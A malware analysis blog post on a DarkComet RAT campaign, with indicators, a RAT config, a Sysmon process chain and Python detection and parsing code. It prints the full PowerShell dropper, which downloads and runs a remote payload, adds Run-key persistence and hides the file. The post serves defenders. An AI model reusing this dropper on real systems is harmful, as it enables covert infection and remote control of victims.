Tuesday, March 19, 2019

DarkComet RAT


Recently I came across a malware sample for analysis in which Google Drive and AWS S3 are used to host the dropper stages, leading to infection with the DarkComet RAT.

DarkComet offers many of the same features as other commercially available RATs and implements the same client-server architecture. "Servers" (the implants) are built on the client machine and deployed to as many remote hosts as required; once deployed they connect back to the client and await commands. The client side provides an administration console to manage all incoming connections, giving full command-and-control capability and file-system access. Multiple server "profiles" can be maintained from a single client, and the servers may be updated or uninstalled remotely.

Below is the malware analysis of the recent DarkComet RAT campaign observed.

Malware Flow

Email --> Google Drive link [drive.google.com/a/uib-saudi.com/file/d/random] --> zip --> .jpg.lnk shortcut posing as an image --> mshta.exe fetches a remote .hta --> powershell / mshta --> http [s3.us-east-2.amazonaws.com/aiite/gfdsdfghjjhgfvbn.jpg decoy image and the executable payload] --> exe dropped in the Roaming (%APPDATA%) directory and the Public directory --> C2 comms & exfiltration.

Malspam

Sender : a.alkady@uib-saudi.com   
Subject  : Re: Confirm Tender Order ##-##-2019-DOCS (Maaden Ammonia III Project in Saudi Arabia)

Link in the email

hxxps://drive.google.com/file/d/1FbOrdVwUlhXsmiEezzgK8TNPA_zHcB8k/view

Content in the Zip file (filename, MD5):

IMG-17032019_0824ScanDocs032948948.jpg.lnk          4a0b849d1c102c7cc5cfef5207de025f
AdvanceOrderConfirmation02394854909854998493.jpg.lnk f776b9d4c4fa3c3aa5675ab4ab66b5c0


Network Comms

GET hxxps://s3.us-east-2.amazonaws.com/aiite/out-1204601640.hta
200 OK (application/hta)

GET hxxps://s3.us-east-2.amazonaws.com/aiite/gfdsdfghjjhgfvbn.jpg
200 OK (image/jpeg)

GET hxxps://s3.us-east-2.amazonaws.com/aiite/PaymentTransfer.scr
200 OK (binary/octet-stream)


Powershell

Stage 2 PowerShell as launched by mshta.exe from the downloaded HTA. It was recorded as a single command line; it is broken at the semicolons here for readability, with the content otherwise unchanged. The `%%` in the random-name generator is almost certainly a log-escaping artifact of the `%` (ForEach-Object) alias, and `$osVersion` is computed but never used.

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy bypass -WindowStyle hidden -nologo
$osCheckMajor = [System.Environment]::OSVersion.Version | Select -Expand Major;
$osCheckMinor = [System.Environment]::OSVersion.Version | Select -Expand Minor;
$osVersion = "$osCheckMajor" + '.' + "$osCheckMinor";
$poshVersion = $PSVersionTable.PSVersion.Major;
if($poshVersion -eq 2){
    $randomInt = Get-Random -Minimum 5 -Maximum 10;
    $randomStr = -join ((65..90) + (97..122) | Get-Random -Count $randomInt | %% {[char]$_});
    $peName = $randomStr + '.exe';
    $savePath = "$env:APPDATA" + '\' + "$peName";
    $decoyName = "$randomStr" + '.jpg';
    $decoyURL = 'hxxps://s3.us-east-2.amazonaws.com/aiite/gfdsdfghjjhgfvbn.jpg';
    $decoyPath = "$env:APPDATA" + '\' + "$decoyName";
    $webClient = New-Object System.Net.WebClient;
    $webDownload = $webClient.DownloadFile($decoyURL, $decoyPath);
    Start-Process $decoyPath;
    Start-Sleep -s 6;
    New-ItemProperty -Path "HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\RUN" -Name $randomStr -Value $savePath -Force;;
    $peDirectURL = 'hxxps://s3.us-east-2.amazonaws.com/aiite/ImgNewOrder001.exe';
    $webClient = New-Object System.Net.WebClient;
    $webDownload = $webClient.DownloadFile($peDirectURL, $savePath)
}elseif($poshVersion -ge 3){
    $randomInt = Get-Random -Minimum 5 -Maximum 10;
    $randomStr = -join ((65..90) + (97..122) | Get-Random -Count $randomInt | %% {[char]$_});
    $peName = $randomStr + '.exe';
    $savePath = "$env:APPDATA" + '\' + "$peName";
    $decoyName = "$randomStr" + '.jpg';
    $decoyURL = 'hxxps://s3.us-east-2.amazonaws.com/aiite/gfdsdfghjjhgfvbn.jpg';
    $decoyPath = "$env:APPDATA" + '\' + "$decoyName";
    Invoke-WebRequest -Uri $decoyURL -OutFile $decoyPath;
    Start-Process $decoyPath;
    Start-Sleep -s 6;
    New-ItemProperty -Path "HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\RUN" -Name $randomStr -Value $savePath -Force;;
    $peDirectURL = 'hxxps://s3.us-east-2.amazonaws.com/aiite/ImgNewOrder001.exe';
    Invoke-WebRequest -Uri $peDirectURL -OutFile $savePath
};
Start-Process $savePath;
attrib +h +s $savePath;""

What the script does, in order: it branches only on the PowerShell major version (WebClient.DownloadFile for v2, Invoke-WebRequest for v3+); downloads and opens the decoy JPEG so the victim sees an "image"; sleeps six seconds; writes an HKCU Run value named with the random string pointing at %APPDATA%\<random>.exe (persistence is registered before the payload is even downloaded); downloads the payload to that path; runs it; and finally sets the hidden and system attributes on it. Note that the script names ImgNewOrder001.exe as the payload, whereas the network capture above shows PaymentTransfer.scr being fetched from the same bucket.


Files Dropped (name, MD5, role):

IMG-17032019_0824ScanDocs032948948.jpg.lnk           4a0b849d1c102c7cc5cfef5207de025f    Content of the zip file from stage 1
AdvanceOrderConfirmation02394854909854998493.jpg.lnk  f776b9d4c4fa3c3aa5675ab4ab66b5c0    Content of the zip file from stage 1
ero.exe                                               c6c3ad08a3a70377645a2b748a85a1aa    Dropped as stage 2
uub.exe                                               c56b5f0201a3b3de53e561fe76912bfd    Dropped as stage 2
ero                                                   1cffe84c56705f7d9c1854c8ce097fe6    Packed file
agpsv.exe                                             0e06054beb13192588e745ee63a84173    Used to establish persistence
AGP Service                                           32072e55e2c70c48df0547018368eb4b    Scheduled task
AGP Service Task                                      fdf7d0d4c401c4671fa29fb0c58fed46    Scheduled task


RAT Config

#BEGIN DARKCOMET DATA --
MUTEX={DC_MUTEX-PG79NDG}
SID={Loften}
FWB={0}
NETDATA={winningstar[.]ddns[.]net:5592|79.134.225[.]23:5592}
GENCODE={mcr2nAsZaT2y}
OFFLINEK={1}
#EOF DARKCOMET DATA --
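The config block above is a flat KEY={VALUE} list between two markers, with the C2 list in NETDATA as pipe-separated host:port pairs. The following parser is an added example written for this post, not part of the original analysis or of any DarkComet tooling; it takes the block exactly as printed (defanged with [.]) and turns it into hunt-ready indicators. The FWB/OFFLINEK flag names are interpreted as firewall-bypass and offline-keylogger flags, which is the commonly documented meaning and an assumption here; GENCODE is kept raw and not interpreted.

```python
import re
from dataclasses import dataclass, field

# Constructed sample input: the config block as printed in this post
# (network indicators defanged with "[.]").
SAMPLE_CONFIG = """
#BEGIN DARKCOMET DATA --
MUTEX={DC_MUTEX-PG79NDG}
SID={Loften}
FWB={0}
NETDATA={winningstar[.]ddns[.]net:5592|79.134.225[.]23:5592}
GENCODE={mcr2nAsZaT2y}
OFFLINEK={1}
#EOF DARKCOMET DATA --
"""

BEGIN_MARK = "#BEGIN DARKCOMET DATA --"
END_MARK = "#EOF DARKCOMET DATA --"
KV_RE = re.compile(r"^([A-Z0-9_]+)=\{(.*)\}$")
IPV4_RE = re.compile(r"^\d{1,3}(?:\.\d{1,3}){3}$")


@dataclass
class DarkCometConfig:
    raw: dict = field(default_factory=dict)     # every KEY={VALUE} pair as found
    mutex: str = ""
    sid: str = ""                               # server/campaign ID
    c2: list = field(default_factory=list)      # [(host, port), ...] in NETDATA order
    firewall_bypass: bool = False               # FWB flag (assumed meaning)
    offline_keylogger: bool = False             # OFFLINEK flag (assumed meaning)


def refang(s: str) -> str:
    return s.replace("[.]", ".")


def parse_darkcomet_config(text: str) -> DarkCometConfig:
    """Parse the KEY={VALUE} lines between the BEGIN/EOF markers."""
    lines = [ln.strip() for ln in text.splitlines() if ln.strip()]
    if BEGIN_MARK not in lines or END_MARK not in lines:
        raise ValueError("DarkComet config markers not found")
    start, end = lines.index(BEGIN_MARK), lines.index(END_MARK)
    cfg = DarkCometConfig()
    for line in lines[start + 1:end]:
        m = KV_RE.match(line)
        if not m:
            raise ValueError(f"unparsable config line: {line!r}")
        cfg.raw[m.group(1)] = m.group(2)
    cfg.mutex = cfg.raw.get("MUTEX", "")
    cfg.sid = cfg.raw.get("SID", "")
    cfg.firewall_bypass = cfg.raw.get("FWB", "0") == "1"
    cfg.offline_keylogger = cfg.raw.get("OFFLINEK", "0") == "1"
    # NETDATA is a '|'-separated list of host:port endpoints. rpartition takes
    # only the trailing ":port" so any ':' inside the host part is preserved.
    for entry in cfg.raw.get("NETDATA", "").split("|"):
        if not entry:
            continue
        host, sep, port = refang(entry).rpartition(":")
        if not sep or not host or not port.isdigit():
            raise ValueError(f"bad NETDATA endpoint: {entry!r}")
        cfg.c2.append((host, int(port)))
    return cfg


def iocs(cfg: DarkCometConfig) -> dict:
    """Flatten a parsed config into indicators you can hunt or block on."""
    hosts = [h for h, _ in cfg.c2]
    return {
        "mutex": cfg.mutex,
        "ips": sorted({h for h in hosts if IPV4_RE.match(h)}),
        "domains": sorted({h for h in hosts if not IPV4_RE.match(h)}),
        "ports": sorted({p for _, p in cfg.c2}),
    }


if __name__ == "__main__":
    parsed = parse_darkcomet_config(SAMPLE_CONFIG)
    print(parsed)
    print(iocs(parsed))
```

The mutex name is the cheapest host-side indicator (a second infection on the same host will fail to create it), while the domain, IP and port feed DNS and firewall hunts; the parser refuses input without both markers rather than silently returning an empty config.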


Flow of command-line execution as recorded in Sysmon.

The trojan uses a combination of mshta.exe, PowerShell and RegSvcs.exe to download, execute, hide and persist. uub.exe spawns a bare RegSvcs.exe (the .NET utility launched with no arguments, consistent with the process-hollowing technique listed below), and that RegSvcs.exe process in turn creates the two "AGP Service" scheduled tasks via schtasks.exe.




C:\Windows\explorer.exe
C:\Windows\System32\mshta.exe
"C:\Windows\system32\mshta.exe" hxxps://s3.us-east-2.amazonaws.com/aiite/out-1204601640.hta
C:\Windows\System32\mshta.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy bypass -Window 1 [void] $null;$jNnCcvJikCAD = Get-Random -Min 3 -Max 4;$LyMOnU = ([char[]]([char]97..[char]122));$rwVPDzq = -join ($LyMOnU | Get-Random -Count $jNnCcvJikCAD | %% ..
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Users\Public\ero.exe
"C:\Users\Public\ero.exe"
C:\Users\Public\ero.exe
C:\Users\papaya\AppData\Local\Temp\55809232\uub.exe
"C:\Users\papaya\AppData\Local\Temp\55809232\uub.exe" vpp=ebt
C:\Users\papaya\AppData\Local\Temp\55809232\uub.exe
C:\Users\papaya\AppData\Local\Temp\55809232\uub.exe
C:\Users\papaya\AppData\Local\Temp\55809232\uub.exe C:\Users\papaya\AppData\Local\Temp\55809232\GAWJV
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
C:\Windows\SysWOW64\schtasks.exe
"schtasks.exe" /create /f /tn "AGP Service" /xml "C:\Users\papaya\AppData\Local\Temp\tmp30A2.tmp"
C:\Users\papaya\AppData\Local\Temp\55809232\uub.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
C:\Windows\SysWOW64\schtasks.exe
"schtasks.exe" /create /f /tn "AGP Service Task" /xml "C:\Users\papaya\AppData\Local\Temp\tmp3110.tmp"
C:\Windows\System32\services.exe
C:\Windows\System32\taskhost.exe
taskhost.exe $(Arg0)


C2  : winningstar[.]ddns[.]net / 79.134.225[.]23, TCP port 5592 (from the NETDATA field of the RAT config)

How to Detect

Email controls are often bypassed when the lure is a link rather than an attachment; infection still requires the user to click through and run the downloaded shortcut.

Looking for execution of mshta.exe, RegSvcs.exe and PowerShell, and in particular for the parent-child relationships between them (mshta spawning powershell, a user-writable binary spawning RegSvcs.exe, RegSvcs.exe spawning schtasks.exe), can lead to detection of this particular malware. Sysmon process-creation events or command-line audit logs are sufficient for this. In terms of the MITRE ATT&CK framework, hunting for the following techniques will lead to the detection of this malware.



ID      Technique                               Tactic
T1059   Command-Line Interface                  Execution
T1012   Query Registry                          Discovery
T1063   Security Software Discovery             Discovery
T1086   PowerShell                              Execution
T1170   Mshta                                   Defense Evasion, Execution
T1053   Scheduled Task                          Persistence, Privilege Escalation, Execution
T1093   Process Hollowing                       Defense Evasion
T1049   System Network Connections Discovery    Discovery
T1121   Regsvcs/Regasm                          Defense Evasion, Execution
T1060   Registry Run Keys / Startup Folder      Persistence
T1158   Hidden Files and Directories            Persistence, Defense Evasion

(Technique IDs are those of the ATT&CK matrix at the time of writing; several have since been folded into sub-techniques: T1086 is now T1059.001, T1170 is T1218.005, T1121 is T1218.009, T1060 is T1547.001, T1158 is T1564.001, T1093 is T1055.012 and T1063 is T1518.001.)
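To make the detection section concrete, here is an added example (written for this post, not part of the original analysis) that runs the hunting logic described above over a handful of constructed Sysmon-style process-creation events modelled on the recorded chain: mshta.exe with a remote HTA, the hidden PowerShell downloader from the Powershell section with its Run-key write and attrib +h +s, execution out of Public/Temp, RegSvcs.exe spawned by a user-writable binary, and schtasks /create from RegSvcs.exe. The event dictionaries and the two benign events are constructed for the example; the rule names are my own labels, and URLs are kept defanged as on the page (the regex accepts both hxxp and http forms).

```python
import ntpath
import re

# Constructed Sysmon-style process-creation events (EventID 1 fields only),
# modelled on the execution chain recorded in this post; URLs are defanged.
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\mshta.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r'"C:\Windows\system32\mshta.exe" hxxps://s3.us-east-2.amazonaws.com/aiite/out-1204601640.hta'},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\System32\mshta.exe",
     "CommandLine": r"""powershell.exe -ExecutionPolicy bypass -WindowStyle hidden -nologo """
                    r"""$decoyURL = 'hxxps://s3.us-east-2.amazonaws.com/aiite/gfdsdfghjjhgfvbn.jpg';"""
                    r"""Invoke-WebRequest -Uri $decoyURL -OutFile $decoyPath;Start-Process $decoyPath;"""
                    r"""New-ItemProperty -Path "HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\RUN" -Name $randomStr -Value $savePath -Force;"""
                    r"""Invoke-WebRequest -Uri 'hxxps://s3.us-east-2.amazonaws.com/aiite/ImgNewOrder001.exe' -OutFile $savePath;"""
                    r"""Start-Process $savePath;attrib +h +s $savePath"""},
    {"Image": r"C:\Users\Public\ero.exe",
     "ParentImage": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r'"C:\Users\Public\ero.exe"'},
    {"Image": r"C:\Users\papaya\AppData\Local\Temp\55809232\uub.exe",
     "ParentImage": r"C:\Users\Public\ero.exe",
     "CommandLine": r'"C:\Users\papaya\AppData\Local\Temp\55809232\uub.exe" vpp=ebt'},
    {"Image": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe",
     "ParentImage": r"C:\Users\papaya\AppData\Local\Temp\55809232\uub.exe",
     "CommandLine": r'"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"'},
    {"Image": r"C:\Windows\SysWOW64\schtasks.exe",
     "ParentImage": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe",
     "CommandLine": r'"schtasks.exe" /create /f /tn "AGP Service" /xml "C:\Users\papaya\AppData\Local\Temp\tmp30A2.tmp"'},
    # Two constructed benign events that must not fire.
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r"powershell.exe -NoProfile Get-Process | Sort-Object CPU"},
    {"Image": r"C:\Windows\System32\schtasks.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r'schtasks.exe /query /tn "AGP Service"'},
]

URL_RE = re.compile(r"""h(?:xx|tt)ps?://[^\s'";]+""", re.I)           # live or defanged URLs
DOWNLOAD_RE = re.compile(r"DownloadFile|DownloadString|Invoke-WebRequest|\biwr\b|Net\.WebClient", re.I)
BYPASS_RE = re.compile(r"-(?:ExecutionPolicy|ep)\s+bypass", re.I)
HIDDEN_RE = re.compile(r"-Window(?:Style)?\s+(?:hidden|1)\b", re.I)     # "-Window 1" == hidden
RUNKEY_RE = re.compile(r"CurrentVersion\\Run\b", re.I)
ATTRIB_HIDE_RE = re.compile(r"\battrib\b.*\+h", re.I)
USER_WRITABLE_RE = re.compile(r"\\Users\\(?:Public|[^\\]+\\AppData\\(?:Local\\Temp|Roaming))\\", re.I)
LOLBIN_PARENTS = {"mshta.exe", "regsvcs.exe", "regasm.exe", "powershell.exe", "wscript.exe", "cscript.exe"}


def exe(path: str) -> str:
    """Lower-cased file name of a Windows path; ntpath works on any OS."""
    return ntpath.basename(path).lower()


def detect(ev: dict) -> list:
    """Return the names of every rule that fires for one process-creation event."""
    img, parent = exe(ev["Image"]), exe(ev["ParentImage"])
    cmd = ev.get("CommandLine", "")
    hits = []
    if img == "mshta.exe" and URL_RE.search(cmd):
        hits.append("mshta_remote_hta")                       # T1170: HTA pulled from a URL
    if img == "powershell.exe":
        if parent == "mshta.exe":
            hits.append("powershell_from_mshta")
        if BYPASS_RE.search(cmd) and HIDDEN_RE.search(cmd) and DOWNLOAD_RE.search(cmd):
            hits.append("powershell_hidden_downloader")       # T1086
        if RUNKEY_RE.search(cmd):
            hits.append("powershell_run_key_persistence")     # T1060
        if ATTRIB_HIDE_RE.search(cmd):
            hits.append("attrib_hide_payload")                # T1158
    if img in ("regsvcs.exe", "regasm.exe") and USER_WRITABLE_RE.search(ev["ParentImage"]):
        hits.append("regsvcs_from_user_writable_parent")      # T1121, hollowing host (T1093)
    if img == "schtasks.exe" and re.search(r"/create\b", cmd, re.I) and parent in LOLBIN_PARENTS:
        hits.append("schtasks_create_from_lolbin")            # T1053
    if USER_WRITABLE_RE.search(ev["Image"]) and ev["Image"].lower().endswith((".exe", ".scr")):
        hits.append("exec_from_user_writable_dir")
    return hits


def hunt(events: list) -> list:
    """Run every rule over a batch; returns (index, image name, hits) per alerting event."""
    alerts = []
    for i, ev in enumerate(events):
        hits = detect(ev)
        if hits:
            alerts.append((i, exe(ev["Image"]), hits))
    return alerts


def extract_urls(events: list) -> list:
    """Collect the staging URLs seen in command lines for blocking and retro-hunting."""
    return sorted({u for ev in events for u in URL_RE.findall(ev.get("CommandLine", ""))})


if __name__ == "__main__":
    for idx, image, rules in hunt(SAMPLE_EVENTS):
        print(idx, image, rules)
    print(extract_urls(SAMPLE_EVENTS))
```

The parent-child rules (mshta spawning PowerShell, RegSvcs.exe spawning schtasks, a Temp/Public binary spawning RegSvcs.exe) are the high-signal ones; the bare "schtasks /create" and "powershell.exe ran" events are far too common on their own, which is why the benign PowerShell and "schtasks /query" events produce no alert.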